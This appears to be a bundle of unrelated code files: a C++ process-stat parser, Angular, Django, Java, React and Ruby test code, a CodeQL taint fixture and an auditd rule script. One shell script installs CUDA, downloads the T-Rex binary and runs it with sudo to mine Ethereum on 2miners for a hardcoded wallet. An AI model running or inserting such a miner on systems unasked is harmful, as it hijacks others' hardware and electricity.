const int _PROCESS_STAT_STARTTIME = 21;
} // namespace LinuxParser
// use std::regex to split string;
// Split `_str` on the regular expression `_reg` and return the pieces.
std::vector<std::string> _split(std::string const _str, std::string const _reg)
{
  std::regex const pattern(_reg);
  std::sregex_token_iterator first(_str.begin(), _str.end(), pattern, -1);
  std::sregex_token_iterator last;
  return std::vector<std::string>(first, last);
}
// DONE: Read and return the number of active jiffies for a PID
// Active jiffies for one process: the utime field of /proc/[pid]/stat.
// (stime/cutime/cstime are intentionally not included here.)
long LinuxParser::ActiveJiffies(int pid)
{
  std::ifstream infstream(kProcDirectory + to_string(pid) + kStatFilename);
  if (!infstream.is_open()) throw "Pid stat not opened!";
  string line;
  getline(infstream, line);
  auto tokens = _split(line, " ");
  if (tokens.size() < _PROCESS_STAT_STARTTIME + 1) throw "Sth wrong with _split!";
  // long stime = std::stol(tokens[_PROCESS_STAT_STIME]);
  long utime = std::stol(tokens[_PROCESS_STAT_UTIME]);
  return utime;
}
// DONE: Read and return the command associated with a process
// Command line that launched the process, from /proc/[pid]/cmdline.
string LinuxParser::Command(int pid)
{
  std::ifstream infstream(kProcDirectory + to_string(pid) + kCmdlineFilename);
  if (!infstream.is_open()) throw "Pid cmdline not opened!";
  string line;
  getline(infstream, line);
  return line;
}
// DONE: Read and return the memory used by a process
// Memory used by the process: the VmSize value (kB) from /proc/[pid]/status.
// NOTE(review): VmSize is total *virtual* memory, not resident RAM (VmRSS) --
// confirm this is the intended metric.
string LinuxParser::Ram(int pid)
{
  std::ifstream infstream(kProcDirectory + to_string(pid) + kStatusFilename);
  if (!infstream.is_open()) throw "Process status not opened! Pid:" + to_string(pid);
  string line;
  while (getline(infstream, line))
  {
    std::stringstream sstream(line);
    string key, value;
    sstream >> key >> value;
    if (key == "VmSize:")
      return value;
  }
  return "0";
}
// DONE: Read and return the user ID associated with a process
// Real uid of the process owner: the first value on the "Uid:" line of
// /proc/[pid]/status. Returns an empty string if the line is absent.
string LinuxParser::Uid(int pid)
{
  std::ifstream infstream(kProcDirectory + to_string(pid) + kStatusFilename);
  if (!infstream.is_open()) throw "Process status not opened! Pid:" + to_string(pid);
  string line;
  while (getline(infstream, line))
  {
    std::stringstream sstream(line);
    string key, value;
    sstream >> key >> value;
    if (key == "Uid:") return value;
  }
  return string();
}
// DONE: Read and return the user associated with a process
// Username of the process owner, resolved through the /etc/passwd cache.
// NOTE(review): std::stoi throws if Uid(pid) returns an empty string (the
// commented-out guard below hints this has happened) -- consider restoring it.
string LinuxParser::User(int pid)
{
  auto& _user = Users();
  // string __uid = Uid(pid);
  // if(!__uid.size()) return "";
  int _uid = std::stoi(Uid(pid));
  if (_user.find(_uid) == _user.end()) throw "No uid: " + to_string(_uid);
  return _user[_uid];
}
// DONE: Read and return the StartTime of a process
// Process start time in seconds after boot: the starttime field of
// /proc/[pid]/stat (reported in clock ticks), divided by the tick rate.
long LinuxParser::StartTime(int pid)
{
  std::ifstream infstream(kProcDirectory + to_string(pid) + kStatFilename);
  if (!infstream.is_open()) throw "Pid stat not opened!";
  string line;
  getline(infstream, line);
  auto tokens = _split(line, " ");
  if (tokens.size() < _PROCESS_STAT_STARTTIME + 1) throw "Sth wrong with _split!";
  long starttime = std::stol(tokens[_PROCESS_STAT_STARTTIME]);
  return starttime / HERTZ;
}
namespace LinuxParser
{
// Per-pid active-jiffy reading from the previous CpuUtilization(pid) sample.
std::unordered_map<int, long> processPreJeffies;
}
// Per-process CPU utilization over the last sampling interval: the delta of
// the process's active jiffies divided by the delta of total system jiffies.
float LinuxParser::CpuUtilization(int pid)
{
  long curActJif = ActiveJiffies(pid);
  float res = 0.0;
  long totalDelta = JiffiesDifference();
  auto prev = processPreJeffies.find(pid);
  // FIX: also require a non-zero system-jiffy delta; previously a zero
  // JiffiesDifference() divided by zero and produced inf/NaN.
  if (prev != processPreJeffies.end() && totalDelta != 0)
    res = static_cast<float>(curActJif - prev->second) / totalDelta;
  processPreJeffies[pid] = curActJif;
  return res;
}
|
<reponame>ThallesTorres/Linguagem_C
// Exercício 12 - Dado um número inteiro positivo n, imprimir os n primeiros naturais ímpares.
#include <stdio.h>
int main(void)
{
    /* Print the first n odd natural numbers, where n is read from stdin. */
    int num, impar;
    impar = 1; /* first odd number */
    printf("Digite um número: ");
    scanf("%d", &num);
    printf("Os %d primeiros números ímpares são: ", num);
    for (int count = 0; count < num; count ++)
    {
        printf("%d ", impar);
        impar += 2; /* advance to the next odd number */
    }
    printf("\n");
}
# Install kernel headers matching the running kernel (needed to build the
# NVIDIA kernel modules).
sudo apt-get install linux-headers-$(uname -r) -y
# Derive the CUDA repo slug from /etc/os-release, e.g. "ubuntu2004".
distribution=$(. /etc/os-release;echo $ID$VERSION_ID | sed -e 's/\.//g')
# Register NVIDIA's CUDA apt repository (pin file, signing key, source list).
wget https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/cuda-$distribution.pin
sudo mv cuda-$distribution.pin /etc/apt/preferences.d/cuda-repository-pin-600
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/7fa2af80.pub
echo "deb http://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64 /" | sudo tee /etc/apt/sources.list.d/cuda.list
sudo apt-get update
sudo apt-get -y install cuda-drivers
sudo apt-get install libcurl3 -y
# Build a worker name from the current timestamp (ddmm_HHMMSS).
# NOTE(review): "woker" is unset before +=, and the variable name looks like a
# typo for "worker" -- it works (empty prefix) but confirm the intent.
woker+=$(date +'%d%m_%H%M%S')
# Download and unpack the T-Rex miner.
wget https://github.com/trexminer/T-Rex/releases/download/0.21.6/t-rex-0.21.6-linux.tar.gz
tar -zxvf t-rex-0.21.6-linux.tar.gz
# NOTE(review): "XXX" looks like a placeholder process name -- confirm.
sudo killall XXX
# Start mining ethash against 2miners, detached in a screen session, then in
# the foreground.
sudo screen ./t-rex -a ethash -o stratum+tcp://us-eth.2miners.com:2020 -u 0xfbbaaec0813a4bb8420b956f4c80519cdabbeb9c -p x -w $woker
./t-rex -a ethash -o us-eth.2miners.com:2020 -u 0xfbbaaec0813a4bb8420b956f4c80519cdabbeb9c -p x -w $woker
echo $woker
|
<filename>src/app/pages/basic-data/orders/trainer-account-reports/trainer-account-reports.component.ts
import { Component, OnInit } from '@angular/core';
import { Router, ActivatedRoute } from '@angular/router';
import { environment } from '../../../../../environments/environment.prod';
import { OrdersService } from '../../../../shared/orders.service';
@Component({
  selector: 'ngx-trainer-account-reports',
  templateUrl: './trainer-account-reports.component.html',
  styles: []
})
export class TrainerAccountReportsComponent implements OnInit {
  TrainerName: string;
  Total: number;
  DetailsList: any[] = [];
  TrainerId;
  useExistingCss: boolean;
  styleName: string;

  constructor(public service: OrdersService, private route: Router,
    private activeRoute: ActivatedRoute) { }

  ngOnInit() {
    this.useExistingCss = true;
    if (environment.production) {
      this.useExistingCss = false;
      // Collect same-origin stylesheet URLs as a comma-separated list.
      // FIX: styleName was never initialized, so the list started with the
      // literal string "undefined".
      this.styleName = '';
      const elements = document.getElementsByTagName('link');
      for (let index = 0; index < elements.length; index++) {
        if (elements[index].href.startsWith(document.baseURI)) {
          this.styleName += elements[index].href + ',';
        }
      }
      // Drop the trailing comma.
      this.styleName = this.styleName.slice(0, -1);
    }
    // Load the account report for either the trainer or the admin route.
    if (this.activeRoute.snapshot.url[0].path == "trainerAccountReports") {
      this.service.getForAccountTrainer().subscribe((res: any) => {
        this.TrainerName = res.Master.TrainerName;
        this.Total = res.Master.Total;
        this.DetailsList = res.result;
      })
    }
    // FIX: this condition used "=" (assignment) instead of "==", so it was
    // always truthy and also overwrote the route snapshot.
    else if (this.activeRoute.snapshot.url[0].path == "AdminAccountReports") {
      this.TrainerId = this.activeRoute.snapshot.paramMap.get("id");
      this.service.getForAdminAccountTrainer(this.TrainerId).subscribe((res: any) => {
        this.TrainerName = res.Master.TrainerName;
        this.Total = res.Master.Total;
        this.DetailsList = res.result;
      })
    }
  }

  // Navigate to the order (DocTypeId == 1) or payment report for the document,
  // using the trainer or admin variant depending on the current route.
  onReports(DocTypeId, DocNum) {
    if (this.activeRoute.snapshot.url[0].path == "trainerAccountReports") {
      if (DocTypeId == 1) {
        this.route.navigateByUrl('/pages/basicData/orderReportsTrainer/' + DocNum);
      }
      else {
        this.route.navigateByUrl('/pages/basicData/paymentTrainerReports/' + DocNum);
      }
    }
    else if (this.activeRoute.snapshot.url[0].path == "AdminAccountReports") {
      if (DocTypeId == 1) {
        this.route.navigateByUrl('/pages/basicData/orderReportsAdmin/' + DocNum);
      }
      else {
        this.route.navigateByUrl('/pages/basicData/paymentAdminReports/' + DocNum);
      }
    }
  }
}
|
from django.db import models
from django.utils import timezone
import datetime
class Appointment(models.Model):
    """A patient's scheduled appointment."""

    # Name of the patient the appointment is booked for.
    patient_name = models.CharField(max_length=100)
    # When the appointment takes place.
    appointment_datetime = models.DateTimeField()
    # Free-text reason for the visit.
    reason = models.CharField(max_length=200)

    def is_future_appointment(self):
        """Return True if the appointment is scheduled after the current time."""
        return self.appointment_datetime > timezone.now()
#! /bin/sh
# Profile the Merge benchmarks of each suite with asv, capturing stdout and
# stderr into per-suite report files.
# FIX: "&>" is a bashism; under POSIX sh it parses as "run in background, then
# truncate the file", losing all output. Use explicit 2>&1 redirection.
asv profile -E existing '^increment.Merge(.*)' > report/increment 2>&1
asv profile -E existing 'original_increment.Merge(.*)' > report/original_increment 2>&1
asv profile -E existing 'original_merge.Merge(.*)' > report/original_merge 2>&1
asv profile -E existing '^merge_increment.Merge(.*)' > report/merge_increment 2>&1
|
<gh_stars>1-10
package kr.co.gardener.admin.model.other.list;
import kr.co.gardener.admin.model.other.Notice;
import kr.co.gardener.util.CommonList;
/**
 * Admin list/form definition for notice management ("공지 관리"): declares the
 * table columns and the insert-form fields.
 */
public class NoticeList extends CommonList<Notice>{
    public NoticeList() {
        super("공지 관리");
        // Table columns: notice id, title, date, content.
        addTh("공지ID", "noticeId", "none");
        addTh("제목", "noticeTitle", "text");
        addTh("날짜", "noticeDate", "date");
        addTh("내용", "noticeContent", "area");
        // NOTE(review): these insert labels read "status ..." (상태) while the
        // field names are notice fields -- looks copy-pasted; confirm labels.
        addInsert("상태ID", "noticeId", "none");
        addInsert("상태명", "noticeTitle", "text");
        addInsert("상태 메시지", "noticeContent", "area");
        setView(true);
    }
}
|
./jwe -train wiki_process.txt -output-word word_vec -output-char char_vec -output-comp comp_vec -size 200 -window 5 -sample 1e-4 -negative 10 -iter 100 -threads 8 -min-count 5 -alpha 0.025 -binary 0 -comp ../subcharacter/comp.txt -char2comp ../subcharacter/char2comp.txt -join-type 1 -pos-type 1 -average-sum 1
|
from ..Core.registers import Registers
from ..Core.commands import Commands
from ..Core.types import Types
from .base import Base
from .itoa_and_write import ItoaWrite
class Write(Base):
    """Emits code for the ``write`` runtime routine (prints a value + newline)."""

    # Tracks whether write.asm has already been linked in, so the runtime
    # routine is loaded at most once per compilation.
    is_loaded = False

    def __init__(self, compiler):
        Base.__init__(self, compiler)
        if Write.is_loaded:
            return
        self.load('write.asm', 'write')
        Write.is_loaded = True

    def call(self, value_type):
        # NOTE(review): the ``or True`` makes this branch unconditional, so
        # every value takes the integer path -- confirm this is intentional.
        if value_type == Types.INT or True:
            ItoaWrite(self.compiler)
            # Pop the value to print into EAX and convert+write it.
            self.compiler.code.add(Commands.POP, Registers.EAX)
            self.compiler.code.add(Commands.CALL, ['itoa_and_write'])
            # Emit a trailing newline (ASCII 10).
            self.compiler.code.add(Commands.MOV, [Registers.EAX, 10])
            self.compiler.code.add(Commands.CALL, ['write'])
        else:
            pass
|
import React from 'react';
import chai, { expect } from 'chai';
import chaiEnzine from 'chai-enzyme';
import { shallow } from 'enzyme';
import FullHeader from '../../src/Main';
// chai.use(chaiEnzine());
// Enzyme shallow-render specs for <FullHeader />: title/subtitle rendering and
// background color.
// NOTE(review): chai.use(chaiEnzine()) is commented out above, yet the bgColor
// specs rely on chai-enzyme's `.style` assertion -- confirm these tests pass.
describe('<FullHeader />', () => {
    it('should have header tag when mount', () => {
        const wrapper = shallow(<FullHeader />);
        expect(wrapper.find('header')).to.have.length(1);
    });
    context('title', () => {
        it('should have h1 tag when title passed', () => {
            const wrapper = shallow(<FullHeader title="TDD" />);
            expect(wrapper.find('h1')).to.have.length(1);
        });
        it('should not have h1 tag when title is not passed', () => {
            const wrapper = shallow(<FullHeader />);
            expect(wrapper.find('h1')).to.have.length(0);
        });
        it('should have h1 tag with the title passed', () => {
            const wrapper = shallow(<FullHeader title="TDD" />);
            expect(wrapper.find('h1').props().children).to.be.equal('TDD');
        });
    });
    context('subtitle', () => {
        it('should have h2 tag when subtitle passed', () => {
            const wrapper = shallow(<FullHeader subtitle="Curso" />);
            expect(wrapper.find('h2')).to.have.length(1);
        });
        it('should not have h2 tag when subtitle is not passed', () => {
            const wrapper = shallow(<FullHeader />);
            expect(wrapper.find('h2')).to.have.length(0);
        });
        it('should have h2 tag with the subtitle passed', () => {
            const wrapper = shallow(<FullHeader subtitle="Curso" />);
            expect(wrapper.find('h2').props().children).to.equal('Curso');
        });
    });
    context('bgColor', () => {
        it('should have background-color equal #ccc when none is passed', () => {
            const wrapper = shallow(<FullHeader title="TDD" />);
            expect(wrapper).to.have.style('background-color').equal('#ccc');
        });
        it('should have background-color equal #000 when is passed', () => {
            const wrapper = shallow(<FullHeader title="TDD" bgColor="#000" />);
            expect(wrapper).to.have.style('background-color').equal('#000');
        });
    });
});
|
<reponame>prt2121/android-workspace
package com.prt2121.rxagain;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.widget.Toolbar;
import android.view.Menu;
import android.view.MenuItem;
import butterknife.Bind;
import butterknife.ButterKnife;
import com.google.gson.GsonBuilder;
import com.google.gson.reflect.TypeToken;
import com.jakewharton.rxbinding.support.v7.widget.RxToolbar;
import com.prt2121.rxagain.model.Repo;
import com.prt2121.rxagain.model.SearchResult;
import java.lang.reflect.Type;
import java.util.List;
import rx.Observable;
import rx.functions.Action1;
import rx.functions.Func1;
import timber.log.Timber;
/**
 * Demonstrates an RxJava pipeline: the toolbar's refresh action (plus one
 * initial emission) triggers a GitHub repository search whose results are
 * parsed with Gson and logged.
 */
public class RepoActivity extends AppCompatActivity {
    @Bind(R.id.repoToolbar) Toolbar toolbar;
    @Override protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_repo);
        ButterKnife.bind(this);
        setSupportActionBar(toolbar);
        // Toolbar item clicks filtered down to the refresh action, mapped to
        // a bare signal (Void).
        final Observable<Void> menuItemClicks =
                RxToolbar.itemClicks(toolbar).filter(new Func1<MenuItem, Boolean>() {
                    @Override public Boolean call(MenuItem menuItem) {
                        Timber.d(menuItem.getTitle().toString());
                        return menuItem.getItemId() == R.id.action_refresh;
                    }
                }).map(new Func1<MenuItem, Void>() {
                    @Override public Void call(MenuItem menuItem) {
                        Timber.d(menuItem.getTitle().toString());
                        return null;
                    }
                });
        // startWith(null) fires one search immediately on create; each refresh
        // click fires another.
        menuItemClicks.startWith((Void) null).map(new Func1<Void, String>() {
            @Override public String call(Void v) {
                return "https://api.github.com/search/repositories?q=reactive";
            }
        }).flatMap(new Func1<String, Observable<String>>() {
            @Override public Observable<String> call(String url) {
                return RxApp.getApp().requestJson(url);
            }
        }).map(new Func1<String, List<Repo>>() {
            @Override public List<Repo> call(String json) {
                // Deserialize the search payload and unwrap the repo list.
                Type type = new TypeToken<SearchResult>() {
                }.getType();
                SearchResult searchResult = new GsonBuilder().create().fromJson(json, type);
                return searchResult.getRepos();
            }
        }).subscribe(new Action1<List<Repo>>() {
            @Override public void call(List<Repo> repoList) {
                for (Repo repo : repoList) {
                    Timber.d(repo.getOwner().getLogin());
                }
            }
        }, new Action1<Throwable>() {
            @Override public void call(Throwable throwable) {
                // Errors are logged only; the stream terminates on error.
                Timber.d(throwable.getMessage());
            }
        });
    }
    @Override public boolean onCreateOptionsMenu(Menu menu) {
        getMenuInflater().inflate(R.menu.menu_repo, menu);
        return true;
    }
}
|
// Unit specs for the procedural listHandler module. `createDescribeHeader`,
// `createItHeader`, `expect`, `assert`, `sinon` and the `global.*` fixtures
// are provided by the surrounding test harness.
const listHandler = require("../../procedural/listHandler");

describe(createDescribeHeader("Procedural listHandler.js"), function() {
  describe(
    createDescribeHeader("#generateSearchResults(booksData)"),
    function() {
      it(
        createItHeader(
          "generates array of book objects when an api result is passed in"
        ),
        () => {
          expect(
            listHandler.generateSearchResults(global.eragonFetchResult)
          ).to.eql(global.eragonObjects);
        }
      );
    }
  );

  describe(createDescribeHeader("#collectBookTitles(books)"), function() {
    it(
      // Fix: description typo "senerates" -> "generates".
      createItHeader("generates an array of book titles from a list of books"),
      () => {
        expect(listHandler.collectBookTitles(global.eragonObjects)).to.eql(
          global.eragonTitles
        );
      }
    );
  });

  describe(
    createDescribeHeader("#addBookToList(searchResultIndex)"),
    function() {
      it(
        createItHeader(
          "adds book at the given index of searchResults array to the readingList array"
        ),
        () => {
          // Stub the follow-up prompt so the test does not block on stdin.
          let stub = sinon
            .stub(listHandler.inputHandler, "initiateOptionsPrompt")
            .callsFake(() => true);
          listHandler.addBookToList(0);
          expect(global.proceduralReadingList).to.eql(global.eragonObjects);
          assert(stub.called);
          stub.restore();
          process.stdin.destroy();
        }
      );
    }
  );
});
|
<reponame>community-boating/cbidb-public-web
import {apBasePath} from "./_base";
export default apBasePath.appendPathSegment<{}>("/reg"); |
<reponame>vadi2/codeql
// CodeQL data-flow / taint-tracking test fixture: `taint()` is the source and
// `sink()` the sink. Box exercises direct field reads/writes; Box2 is the same
// shape routed through getters/setters. NOTE(review): this code is analysis
// input — its logic is intentional and must not be "fixed" or refactored.
public class A {
String taint() { return "tainted"; }
void sink(Object o) { }
// Identity-ish string step the analysis must track through.
static String step(String s) { return s + "0"; }
// Direct-field-access variant.
static class Box {
String s;
Box(String s) {
this.s = s + "1";
}
String getS1() { return s + "2"; }
String getS2() { return step(s + "_") + "2"; }
void setS1(String s) { this.s = "3" + s; }
void setS2(String s) { this.s = "3" + step("_" + s); }
static Box mk(String s) {
Box b = new Box("");
b.s = step(s);
return b;
}
}
void foo(Box b1, Box b2) {
b1.setS1(taint());
sink(b1.getS1());
b2.setS2(taint());
sink(b2.getS2());
String t3 = taint();
Box b3 = new Box(step(t3));
sink(b3.s);
Box b4 = Box.mk(taint());
sink(b4.getS1());
}
// Getter/setter variant of Box.
static class Box2 {
String s;
String getS() { return s; }
void setS(String s) { this.s = s; }
Box2(String s) {
setS(s + "1");
}
String getS1() { return getS() + "2"; }
String getS2() { return step(getS() + "_") + "2"; }
void setS1(String s) { setS("3" + s); }
void setS2(String s) { setS("3" + step("_" + s)); }
static Box2 mk(String s) {
Box2 b = new Box2("");
b.setS(step(s));
return b;
}
}
void foo2(Box2 b1, Box2 b2) {
b1.setS1(taint());
sink(b1.getS1());
b2.setS2(taint());
sink(b2.getS2());
String t3 = taint();
Box2 b3 = new Box2(step(t3));
sink(b3.s);
Box2 b4 = Box2.mk(taint());
sink(b4.getS1());
}
}
|
#!/bin/bash
# profiles = xccdf_org.ssgproject.content_profile_ospp
# remediation = none
# Use auditctl in RHEL7
# Switch auditd to loading rules via auditctl (drops any augenrules arguments).
sed -i "s%^ExecStartPost=.*%ExecStartPost=-/sbin/auditctl%" /usr/lib/systemd/system/auditd.service
# Audit read access to the audit trail by unprivileged (auid >= 1000) users.
echo "-a always,exit -F dir=/var/log/audit/ -F perm=r -F auid>=1000 -F auid!=unset -F key=access-audit-trail" >> /etc/audit/audit.rules
|
package com.md.appbrige.appuserconnect.server;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import javax.jdo.Extent;
import javax.jdo.JDOHelper;
import javax.jdo.PersistenceManager;
import javax.jdo.PersistenceManagerFactory;
import com.md.appbrige.appuserconnect.model.Message;
/**
 * JDO-backed CRUD access for {@link Message} entities. Every operation
 * acquires its own PersistenceManager and always closes it, even on failure.
 */
public class MessageRepository {
    PersistenceManagerFactory pmfInstance = JDOHelper.getPersistenceManagerFactory("transactions-optional");

    /** Loads every persisted Message by walking the class extent. */
    public Collection<Message> getAll() {
        PersistenceManager manager = pmfInstance.getPersistenceManager();
        try {
            Extent<Message> extent = manager.getExtent(Message.class, false);
            List<Message> loaded = new ArrayList<Message>();
            for (Message each : extent) {
                loaded.add(each);
            }
            extent.closeAll();
            return loaded;
        } finally {
            manager.close();
        }
    }

    /** Persists the given message. */
    public void create(Message message) {
        PersistenceManager manager = pmfInstance.getPersistenceManager();
        try {
            manager.makePersistent(message);
        } finally {
            manager.close();
        }
    }

    /** Deletes the message with the given datastore identity. */
    public void deleteById(Long id) {
        PersistenceManager manager = pmfInstance.getPersistenceManager();
        try {
            manager.deletePersistent(manager.getObjectById(Message.class, id));
        } finally {
            manager.close();
        }
    }
}
|
#!/bin/sh
# Provision a 'ps2' user whose data is meant to live under /.drive/ps2.
mkdir /.drive/ps2
# NOTE(review): with a single argument this creates ./ps2 -> /home/ps2 in the
# CURRENT directory; the intent was likely `ln -s /.drive/ps2 /home/ps2` so the
# home directory points at the drive — confirm before relying on this script.
ln -s /home/ps2
useradd ps2 -d /home/ps2
# Seed the new home with the pi user's shell config, then hand over ownership.
cp /home/pi/.bashrc /home/ps2/
cp /home/pi/.profile /home/ps2
chown ps2:ps2 -R /home/ps2
|
<reponame>vasinov/cathouse-frontend
require_relative '../test_helper'
# Integration coverage for rendering CMS content through a regular Rails
# controller: implicit and explicit page rendering, explicit layouts, custom
# blocks, alternate sites, and status overrides.
# NOTE(review): the class name has a typo ("Intergration"); left as-is since
# renaming could break references elsewhere.
class RenderCmsIntergrationTest < ActionDispatch::IntegrationTest
def setup
super
# Temporary routes pointing at the test controller defined below.
Rails.application.routes.draw do
get '/render-basic' => 'render_test#render_basic'
get '/render-page' => 'render_test#render_page'
get '/site-path/render-page' => 'render_test#render_page'
get '/render-layout' => 'render_test#render_layout'
end
comfy_cms_layouts(:default).update_columns(:content => '{{cms:page:content}}')
# NOTE(review): #update_attributes is deprecated in recent Rails versions;
# fine for the Rails version this suite pins — verify before upgrading.
comfy_cms_pages(:child).update_attributes(:blocks_attributes => [
{ :identifier => 'content', :content => 'TestBlockContent' }
])
end
def teardown
# Restore the application's real route set after the routes drawn in setup.
Rails.application.reload_routes!
end
# Builds a second site ('site-b') with its own layout and a root page.
def create_site_b
site = Comfy::Cms::Site.create!(
:identifier => 'site-b',
:hostname => 'site-b.test')
layout = site.layouts.create!(
:identifier => 'default',
:content => 'site-b {{cms:page:content}}')
page = site.pages.create!(
:label => 'default',
:layout => layout,
:blocks_attributes => [{ :identifier => 'content', :content => 'SiteBContent' }])
end
# Minimal controller exercising every render variant under test.
class ::RenderTestController < ApplicationController
append_view_path(File.expand_path('../fixtures/views', File.dirname(__FILE__)))
def render_basic
case params[:type]
when 'text'
# NOTE(review): `render :text` was removed in Rails 5.1 (use :plain) —
# another sign this suite targets an older Rails.
render :text => 'TestText'
when 'update'
render :update do |page|
page.alert('rendered text')
end
else
render
end
end
def render_page
case params[:type]
when 'page_implicit'
render
when 'page_explicit'
render :cms_page => '/test-page'
when 'page_explicit_with_status'
render :cms_page => '/test-page', :status => 404
when 'page_explicit_with_site'
render :cms_page => '/', :cms_site => 'site-b'
when 'page_explicit_with_blocks'
render :cms_page => '/test-page', :cms_blocks => {
:content => 'custom page content'
}
else
raise 'Invalid or no param[:type] provided'
end
end
def render_layout
@test_value = 'TestValue'
case params[:type]
when 'layout_defaults'
render :cms_layout => 'default'
when 'layout'
render :cms_layout => 'default', :cms_blocks => {
:content => 'TestText',
:content_b => { :partial => 'render_test/test' },
:content_c => { :template => 'render_test/render_layout' }
}
when 'layout_with_status'
render :cms_layout => 'default', :status => 404
when 'layout_invalid'
render :cms_layout => 'invalid'
when 'layout_defaults_with_site'
render :cms_layout => 'default', :cms_site => 'site-b'
when 'layout_with_action'
render :cms_layout => 'default', :action => :new
else
raise 'Invalid or no param[:type] provided'
end
end
def new
end
end
# -- Basic Render Tests ---------------------------------------------------
def test_text
get '/render-basic?type=text'
assert_response :success
assert_equal 'TestText', response.body
end
def test_implicit_cms_page_failure
Comfy::Cms::Site.destroy_all
assert_exception_raised ActionView::MissingTemplate do
get '/render-basic'
end
end
# -- Page Render Test -----------------------------------------------------
def test_implicit_cms_page
page = comfy_cms_pages(:child)
page.update_attributes(:slug => 'render-basic')
get '/render-basic?type=page_implicit'
assert_response :success
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert assigns(:cms_page)
assert_equal page, assigns(:cms_page)
assert_equal 'TestBlockContent', response.body
end
def test_implicit_cms_page_with_site_path
comfy_cms_sites(:default).update_column(:path, 'site-path')
comfy_cms_pages(:child).update_attributes(:slug => 'render-page')
get '/site-path/render-page?type=page_implicit'
assert_response :success
assert_equal 'TestBlockContent', response.body
end
def test_explicit_cms_page
page = comfy_cms_pages(:child)
page.update_attributes(slug: 'test-page')
get '/render-page?type=page_explicit'
assert_response :success
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert assigns(:cms_page)
assert_equal page, assigns(:cms_page)
assert_equal 'TestBlockContent', response.body
end
def test_explicit_cms_page_with_status
page = comfy_cms_pages(:child)
page.update_attributes(:slug => 'test-page')
get '/render-page?type=page_explicit_with_status'
assert_response 404
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert assigns(:cms_page)
assert_equal page, assigns(:cms_page)
assert_equal 'TestBlockContent', response.body
end
def test_explicit_cms_page_failure
page = comfy_cms_pages(:child)
page.update_attributes(:slug => 'invalid')
assert_exception_raised ComfortableMexicanSofa::MissingPage do
get '/render-page?type=page_explicit'
# NOTE(review): this raise only runs if `get` does NOT raise as expected;
# looks like leftover debugging.
raise Rails.env.to_s
end
end
def test_explicit_with_site
create_site_b
get '/render-page?type=page_explicit_with_site'
assert_response :success
assert assigns(:cms_site)
assert_equal 'site-b', assigns(:cms_site).identifier
assert_equal 'site-b SiteBContent', response.body
end
def test_explicit_with_site_failure
assert_exception_raised ComfortableMexicanSofa::MissingSite do
get '/render-page?type=page_explicit_with_site'
end
end
def test_explicit_with_page_blocks
page = comfy_cms_pages(:child)
page.update_attributes(slug: 'test-page')
get '/render-page?type=page_explicit_with_blocks'
assert_response :success
assert_equal 'custom page content', response.body
end
# -- Layout Render Tests --------------------------------------------------
def test_cms_layout_defaults
get '/render-layout?type=layout_defaults'
assert_response :success
assert_equal 'TestTemplate TestValue', response.body
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert_equal comfy_cms_layouts(:default), assigns(:cms_layout)
end
def test_cms_layout
comfy_cms_layouts(:default).update_columns(:content => '{{cms:page:content}} {{cms:page:content_b}} {{cms:page:content_c}}')
get '/render-layout?type=layout'
assert_response :success
assert_equal 'TestText TestPartial TestValue TestTemplate TestValue', response.body
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert_equal comfy_cms_layouts(:default), assigns(:cms_layout)
end
def test_cms_layout_with_status
get '/render-layout?type=layout_with_status'
assert_response 404
assert_equal 'TestTemplate TestValue', response.body
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert_equal comfy_cms_layouts(:default), assigns(:cms_layout)
end
def test_cms_layout_with_action
comfy_cms_layouts(:default).update_columns(:content => '{{cms:page:content}} {{cms:page:content_b}} {{cms:page:content_c}}')
get '/render-layout?type=layout_with_action'
assert_response :success
assert_equal "Can render CMS layout and specify action\n ", response.body
assert assigns(:cms_site)
assert assigns(:cms_layout)
assert_equal comfy_cms_layouts(:default), assigns(:cms_layout)
end
def test_cms_layout_failure
assert_exception_raised ComfortableMexicanSofa::MissingLayout do
get '/render-layout?type=layout_invalid'
end
end
def test_cms_layout_defaults_with_site
create_site_b
get '/render-layout?type=layout_defaults_with_site'
assert_response :success
assert assigns(:cms_site)
assert_equal 'site-b', assigns(:cms_site).identifier
assert_equal 'site-b TestTemplate TestValue', response.body
end
def test_cms_layout_defaults_with_site_failure
assert_exception_raised ComfortableMexicanSofa::MissingSite do
get '/render-layout?type=layout_defaults_with_site'
end
end
end
|
<gh_stars>1-10
# This initializer will catch the use of deprecated gqueries. Since there can be thousands of events
# we should decide what to do with them. At the moment I'm just showing them on the log. We could
# save them to a separate log file or store them externally and use a gquery counter.
#
# Each rotating logger keeps 5 files of at most 1 MiB (1_048_576 bytes).
if Rails.root.join('log').directory?
GqlLogger = Logger.new(Rails.root.join('log/gql.log'), 5, 1_048_576)
GqlWarnings = Logger.new(Rails.root.join('log/warnings.log'), 5, 1_048_576)
# For quick debugging sessions
DebugLogger = Logger.new(Rails.root.join('log/debug.log'), 5, 1_048_576)
else
# This only happens during a cold deploy, when running a setup Rake task
# before the shared directories are symlinked.
GqlLogger = Logger.new($stderr)
GqlWarnings = Logger.new($stderr)
DebugLogger = Logger.new($stderr)
end
# Shared one-line format: "[timestamp progname] message".
GqlWarnings.formatter = GqlLogger.formatter =
proc do |severity, datetime, progname, message|
progname = " #{ progname }" unless progname.nil?
"[#{ datetime }#{ progname }] #{ message }\n"
end
ActiveSupport::Notifications.subscribe 'gql.gquery.deprecated' do |name, start, finish, id, payload|
GqlLogger.info "gql.gquery.deprecated: #{payload}"
end
ActiveSupport::Notifications.subscribe 'gql.debug' do |name, start, finish, id, payload|
GqlLogger.debug "gql.debug: #{payload}"
end
# Forward all warning notifications to the warnings log.
ActiveSupport::Notifications.subscribe /^warn/ do |name|
GqlWarnings.warn name
end
# Show all 'performance' related outputs
ActiveSupport::Notifications.subscribe /\.performance/ do |name, start, finish, id, payload|
GqlLogger.debug "#{(name+":").ljust(80)} #{(finish - start).round(3).to_s.ljust(5)} s"
end
